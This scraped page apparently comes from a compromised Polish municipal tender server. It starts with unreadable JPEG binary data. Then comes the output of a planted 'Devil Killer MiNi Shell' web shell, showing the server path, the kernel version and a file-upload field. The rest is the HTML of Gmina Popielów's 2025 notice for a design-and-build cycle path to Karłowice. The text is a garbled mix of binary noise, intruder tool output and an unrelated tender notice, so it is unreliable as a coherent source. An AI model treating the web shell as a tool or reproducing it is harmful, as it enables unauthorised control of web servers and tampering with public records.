JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250613/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250613/0027748101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA POPIELÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Opolska 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Popielów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-090</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774275822</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@popielow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.popielow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3a40e00b-a4ad-4c90-81a9-d36a3c528c67</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00277481</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038154/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Funduszy Europejskich dla Opolskiego 2021-2027. Umowa o dofinansowanie: FEOP.03.02-IZ.00-0001/24, data podpisania: 22.05.2025 r. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/popielow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/popielow Zamawiający dopuszcza komunikację za<br/>pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osób uprawnionych do kontaktu z Wykonawcami:<br/>przetargi@popielow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1.7. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na www.platformazakupowa.pl tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na www.platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>11.1.8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z www.platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/>pod linkiem https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.<br/>11.1.9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>www.platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu<br/>składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.<br/>11.1.10. Zamawiający informuje, że instrukcje korzystania z www.platformazakupowa.pl dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu<br/>przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>11.1.11. Specyfikację warunków zamówienia udostępnia się na stronie internetowej Platformy zakupowej:<br/>https://platformazakupowa.pl/pn/popielow<br/>11.2.13. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia<br/>Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych” z dnia 21 maja 2024 r. (Dz.U.2024.773 z<br/>dnia 2024.05.22), zwanego dalej Rozporządzeniem KRI.<br/>11.2.14. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg), ze szczególnym wskazaniem na<br/>.pdf<br/>11.2.15. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:<br/>1) .zip<br/>2) .7Z<br/>11.2.16. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie 10 MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi maksymalnie 5 MB.<br/>11.2.17. W przypadku stosowania przez Wykonawcę kwalifikowanego podpisu elektronicznego:<br/>− (...)<br/>Z uwagi na ograniczoną liczbę znaków, pełen zakres informacji znajduje się w rozdziale 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">22.1.	Klauzula informacyjna RODO dla osoby, której dane są przetwarzane w ramach realizacji Projektu (art.13 i 14 RODO) [dla Oferentów, Wykonawców/ Strony umowy w sprawie realizacji zadań w Projekcie UE]<br/>W związku ze złożeniem oferty/wykonywaniem, świadczeniem lub dostarczeniem robót, usług lub produktów w ramach Projektu pn. „Bezpieczny transport w Aglomeracji Opolskiej” (nr Projektu FEOP.03.02-IZ.00-0001/24) zgodnie z art. 13 ust. 1 i 2 i art.14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. U. EU. L. 2016.119.1) [dalej: RODO], informujemy, iż:<br/>1.	Administratorem Pani/Pana danych osobowych przetwarzanych w związku z realizacją ww. Projektu jest Gmina Popielów, ul. Opolska 13, 46-090 Popielów, tel: (77) 469 20 27, e-mail: ug@popielow.pl, będąca Partnerem tego projektu (dalej: Administrator).<br/>2.	Administrator powołał Inspektora ochrony danych, z którym może się Pani / Pan kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem poczty elektronicznej: iod@popielow.pl lub listownie na adres siedziby Administratora z dopiskiem &#34;IOD&#34;.<br/>3.	Pani/Pana dane osobowe przetwarzane będą w celu przygotowania i przeprowadzenia postępowań ofertowych oraz przetargowych w ramach realizowanego projektu unijnego pn. „Bezpieczny transport w Aglomeracji Opolskiej”, w tym w szczególności w celu wyboru oferentów/wykonawców oraz zawarcia i realizacji z nimi umów/zamówień. <br/>Podstawą prawną przetwarzania danych jest:<br/>a)	art. 6 ust. 1 lit. b RODO (niezbędność do podjęcia działań przed zawarciem umowy/zamówienia i wykonania umowy/zamówienia z osobą, której dane dotyczą) <br/>b)	z art. 6 ust. 1 lit. c RODO (wypełnienie obowiązku prawnego ciążącego na Administratorze w związku z przeprowadzeniem postepowań ofertowych lub przetargowych realizowanych w ramach niniejszego Projektu). Przetwarzanie odbywa się w szczególności w celu realizacji obowiązków wynikających z przepisów prawa (między innymi przewidzianych w ustawie Prawo zamówień publicznych, o ile ma zastosowanie) oraz spełnienia wymogów wynikających z umowy o dofinansowanie Projektu nr FEOP.03.02-IZ.00-0001/24 i Umowy o partnerstwie na rzecz przygotowania i realizacji Projektu: „Bezpieczny transport w Aglomeracji Opolskiej” z dnia 8 lipca 2024r.<br/>c)	art. 6 ust. 1 lit. e RODO w zw. z art. 7 ust. 1 pkt 1 ustawy o samorządzie gminnym i art. 2 ust. 1 ustawy wdrożeniowej – wykonanie zadania realizowanego w interesie publicznym, polegającego na przygotowaniu i realizacji projektu współfinansowanego ze środków UE<br/>4.	Jeżeli Pani/Pana dane osobowe nie zostały pozyskane bezpośrednio, ich źródłem jest Oferent/Wykonawca, który złożył ofertę lub zawiera umowę w ramach niniejszego postępowania. Przetwarzane kategorie danych obejmują: imię, nazwisko, stanowisko lub funkcję, służbowe dane kontaktowe (numer telefonu, adres e-mail), dane identyfikujące pracodawcę oraz, w razie potrzeby, podpis i numer dokumentu potwierdzającego umocowanie do reprezentacji.<br/>5.	Zgodnie z obowiązującymi przepisami prawa Pani/Pana dane osobowe są udostępniane uprawnionym podmiotom i instytucjom (odrębnym administratorom), w tym wskazanym w art. 89 ustawy z dnia 28 kwietnia 2022r. o zasadach realizacji zadań finansowanych ze środków europejskich w perspektywie finansowej 2021-2027 (Dz.U.2022 poz. 1079 z późn. zm.) dalej zwaną „ustawą wdrożeniową”, w szczególności: <br/>1)	Ministrowi właściwemu ds. rozwoju regionalnego – Ministrowi Funduszy i Polityki Regionalnej, ul. Wspólna 2/4, 00-926 Warszawa;<br/>2)	Ministrowi właściwemu ds. finansów publicznych – Ministrowi Finansów, ul. Świętokrzyska 12, 00-916 Warszawa;<br/>3)	Instytucji Zarządzającej programem regionalnym Fundusze Europejskie dla (...)<br/><br/>Z uwagi na ograniczoną liczbę znaków, pełen zakres informacji znajduje się w rozdziale 22 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOS.271.8.2025.BK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia są roboty budowlane związane z wykonaniem zadania w systemie „zaprojektuj i wybuduj: Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice”, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej”. Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>1)	opracowanie dokumentacji projektowo – kosztorysowej niezbędnych branż wraz z uzyskaniem niezbędnych decyzji administracyjnych, opinii i pozwoleń umożliwiających realizację robót budowlanych, zgodnie z zakresem określonym w PFU, w tym:<br/>a)	opracowanie mapy do celów projektowych w skali wymaganej przez obowiązujące przepisy prawa (w niezbędnej ilości),<br/>b)	projekty podziału nieruchomości (7 egz. w wersji papierowej),<br/>c)	projekt tymczasowej organizacji ruchu wraz z jej zatwierdzeniem,<br/>d)	projekt stałej organizacji ruchu wraz z jej zatwierdzeniem,<br/>e)	opracowanie operatów wodnoprawnych wraz z uzyskaniem pozwoleń wodnoprawnych (jeżeli przepisy prawa tego wymagają), <br/>f)	wykonanie szczegółowej inwentaryzacji zieleni wraz z planem wyrębu (7 egz. w wersji papierowej),<br/>g)	wykonanie badań geotechnicznych podłoża gruntowego (w ilości niezbędnej do prawidłowego wykonania projektu budowlanego z elementami projektu wykonawczego),<br/>h)	projekt budowlany w zakresie niezbędnym do wydania decyzji pozwolenia na budowę/decyzji ZRID (7 egz. w wersji papierowej),<br/>i)	projekt wykonawczy/techniczny wszystkich branż (7 egz. w wersji papierowej),<br/>j)	specyfikacje techniczne wykonania i odbioru robót (STWiORB) (2 egz. w wersji papierowej),<br/>k)	przedmiar i kosztorys wszystkich branż (po 2 egz. w wersji papierowej),<br/>l)	opracowanie/uzyskanie dokumentacji, wniosków, operatów, pozwoleń, uzgodnień, opinii, sprawdzeń wynikających z przepisów, niezbędnych do uzyskania decyzji pozwolenia na budowę/decyzji ZRID oraz uprawniających do przystąpienia do realizacji robót budowlanych;<br/>m)	opracowanie dokumentacji zgodnie z Kryteriami Środowiskowymi dla wszystkich działań FEO 2021-2027, stanowiącymi załącznik do Regulaminu wyboru projektów obowiązującego w naborze 3.2 Mobilność miejska w ZIT, zamieszczonymi na stronie internetowej https://funduszeue.opolskie.pl/nabory/32-mobilnosc-miejska-w-zit <br/>n)	opracowanie dokumentacji projektowej i technicznej zgodnie z załączoną do PFU decyzją o środowiskowych uwarunkowaniach,<br/>o)	uzyskanie decyzji pozwolenia na budowę/decyzji ZRID,<br/>p)	sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego (BIOZ),<br/>q)	inne projekty, które podczas ustaleń z zamawiającym uznane zostaną za niezbędne do prawidłowego wykonania zadania lub wynikające z przepisów prawa (nie wykraczające poza zakres przedmiotu zamówienia),<br/>r)	kompletna dokumentacja w wersji elektronicznej edytowalnej .doc/.docx, .dwg/.dxf oraz .pdf, natomiast kosztorysy i przedmiary w wersji .pdf oraz .ath, a także skany niezbędnych opinii i uzgodnień w formacie .pdf na płycie CD lub nośniku pamięci USB (3 szt.);<br/>s)	pośredniczenie pomiędzy Zamawiającym a Zarządcą drogi w celu zapewnienia prawidłowej realizacji przedmiotu zamówienia, tj. w celu uzyskania prawomocnej decyzji pozwolenia na budowę/decyzji ZRID dla przedmiotowego przedsięwzięcia,<br/>t)	sprawowanie nadzoru autorskiego w rozumieniu art. 20 ust. 1 pkt 4) ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2025.418 t.j. z dnia 2025.04.01) w czasie robót budowlanych wykonywanych na podstawie opracowanej dokumentacji; nadzór autorski będzie obejmował w szczególności:<br/>	pobyt na budowie – do 10 razy,<br/>	pobyt w siedzibie Zamawiającego – do 10 razy,<br/>	prace w siedzibie nadzoru autorskiego,<br/>	opracowanie opinii – do 5 razy;<br/>u)	w ramach nadzoru autorskiego Wykonawca zobowiązany będzie m.in. do:<br/>	opiniowania zgodności wszystkich projektów wykonywanych przez Wykonawcę robót zadania inwestycyjnego w zakresie zgodności z wymaganiami dokumentacji projektowej, <br/>	wykonywania projektów zamiennych, <br/>	wyjaśniania wykonawcy prac objętych dokumentacją budowlaną wątpliwości powstałych w toku realizacji robót, <br/>	niezwłocznego wykonania poprawek i uzupełnień w dokumentacji projektowej;<br/>2)	dostawa i montaż tablic informacyjno-promocyjnych o wymiarach 240x120 cm – 2 szt. (po jednej na początku i na końcu inwestycji); wykonanie tablic oraz ich umieszczenie w miejscu realizacji projektu musi być zgodne z wytycznymi zamieszczonymi na stronie: https://funduszeue.opolskie.pl/komunikacja-i-promocja; Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym projektu tablicy, przed zleceniem jej realizacji;<br/>	tablice powinny być jednostronne, na podkładzie metalowym z podwójnie zawiniętą krawędzią, o wskazanych powyżej wymiarach; każda tablica mocowana na dwóch słupkach ze stali ocynkowanej o wysokości ok 3,30 m i średnicy 50 mm umieszczonych w gruncie w obrębie realizowanej inwestycji;<br/>	tablice muszą być umiejscowione w docelowych miejscach w chwili rozpoczęcia robót budowlanych;<br/>3)	wykonanie robót budowlanych i instalacyjnych w oparciu o opracowaną dokumentację, m.in.:<br/>a)	wprowadzenie tymczasowej organizacji ruchu,<br/>b)	wycinka drzew i krzewów wraz z karczowaniem korzeni,<br/>c)	budowa przepustów,<br/>d)	budowa obiektów inżynierskich, w tym mostowych,<br/>e)	budowa ścieżki rowerowej i pieszo-rowerowej o nawierzchni bitumicznej o dł. ok 5,6 km, szer. ok 2,0 – 3,0 m,<br/>f)	budowa i przebudowa odwodnienia (rowy, kanalizacja deszczowa),<br/>g)	wykonanie skarp i poboczy,<br/>h)	wykonanie przejść/przejazdów pieszo-rowerowych,<br/>i)	przebudowa i rozbudowa skrzyżowania drogi powiatowej,<br/>j)	przebudowa części drogi powiatowej na odc. ok 180 m w miejscowości Karłowice,<br/>k)	budowa i przebudowa zjazdów,<br/>l)	likwidacja kolizji z istniejącą i projektowaną infrastrukturą techniczną,<br/>m)	budowa kanału technologicznego (jeżeli zajdzie taka konieczność),<br/>n)	wykonanie oświetlenia przejść/przejazdów,<br/>o)	montaż urządzeń bezpieczeństwa ruchu,<br/>p)	wprowadzenie docelowej stałej organizacji ruchu (oznakowanie poziome i pionowe),<br/>q)	wykonanie trwałej stabilizacji granic pasa drogowego zgodnie z decyzją o zezwoleniu na realizację inwestycji drogowej – wyznaczenie i utrwalenie na gruncie nowych punktów granicznych znakami naziemnymi i podziemnymi;<br/>4)	przygotowanie i przedłożenie kompletnej dokumentacji powykonawczej pozwalającej Zamawiającemu na zakończenie budowy/robót i/lub oddanie obiektu do użytku;<br/>UWAGA:<br/>PFU zawiera informację, że jeżeli Wykonawca w trakcie opracowywania dokumentacji projektowej uzyska odstąpienie od konieczności zaprojektowania kanału technologicznego – nie będzie konieczności jego wykonywania w trakcie robót. Z uwagi na konieczność zachowania zasady konkurencyjności wszyscy Wykonawcy zobowiązani są uwzględnić przy obliczaniu ceny ofertowej konieczność zaprojektowania i wykonania kanału technologicznego. Złożone w ten sposób oferty będą porównywalne. Zgodnie z zapisami SWZ jeżeli faktycznie zajdzie możliwość niewykonywania kanału technologicznego, wówczas zgodnie z zapisami zawartej umowy zakres umowy zostanie zmniejszony, a tym wartość umowy również zostanie pomniejszona.<br/><br/>4.3.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 1 do SWZ – PFU (Program Funkcjonalno-Użytkowy). Składają się na niego następujące dokumenty:<br/>1)	Program Funkcjonalno-Użytkowy wraz z szacunkowym zbiorczym zestawieniem kosztów (w formie pustego przedmiaru),<br/>2)	Opinia geotechniczna,<br/>3)	Decyzja o środowiskowych uwarunkowaniach (wersja dostępna + skan); </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - 